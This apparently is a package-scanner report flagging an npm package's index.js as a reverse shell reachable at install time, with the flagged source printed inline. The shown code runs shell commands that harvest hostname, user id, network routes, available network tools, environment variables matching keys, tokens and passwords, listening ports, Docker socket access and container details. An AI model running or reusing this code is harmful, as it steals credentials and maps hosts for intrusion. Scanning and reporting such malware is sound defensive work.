Lines 1-22javascript
2 var net = require('net');
3 var cp = require('child_process');
4
CriticalReverse Shell
Source matches reverse-shell style process and socket wiring.
index.jsView on unpkg · L1 CriticalTrigger Reachable Dangerous Capability
A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.
index.jsView on unpkg · L1 6 try { return cp.execSync(cmd, {timeout:5000, encoding:'utf8'}); }
7 catch(e) { return 'ERR: '+e.message; }
10 // Quick availability check
12 'HOST='+run('hostname').trim(),
13 'ID='+run('id').trim().replace(/\n/g,' '),
14 'IP='+run('hostname -I 2>/dev/null||ip addr 2>/dev/null|grep "inet "|awk "{print \$2}"').replace(/\n/g,' '),
15 'ROUTE='+run('ip route 2>/dev/null|grep default||route -n 2>/dev/null|grep "^0.0.0.0"').replace(/\n/g,' '),
16 'TOOLS='+run('which curl wget python3 python nc bash sh node 2>/dev/null').replace(/\n/g,' '),
17 'ENV='+run('env|grep -iE "api|key|token|secret|pass|db|mongo|redis|evolution|whatsapp|webhook|n8n|docker|container|host|port"').replace(/\n/g,' | '),
18 'PORTS='+run('ss -tlnp 2>/dev/null||netstat -tlnp 2>/dev/null').replace(/\n/g,' | '),
19 'DOCKER='+run('ls -la /var/run/docker.sock /run/docker.sock 2>&1').trim(),
20 'MOUNTS='+run('mount 2>/dev/null|grep -v "cgroup\|proc\|sys\|dev\|tmp\|run"|head -10').replace(/\n/g,' | '),
21 'CGROUP='+run('cat /proc/1/cgroup 2>/dev/null|head -3').replace(/\n/g,' | '),
22 'CAPS='+run('cat /proc/self/status 2>/dev/null|grep Cap').replace(/\n/g,' | '),